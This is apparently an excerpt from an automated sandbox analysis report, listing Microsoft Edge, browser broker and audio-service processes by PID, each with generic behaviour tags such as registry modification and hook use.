C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4804
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4108
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4624
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3452
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4752
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1224
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1648
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4728
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3772
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4176
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4320
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1096
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1432
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:332
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0xf81⤵
- Suspicious use of AdjustPrivilegeToken
PID:2764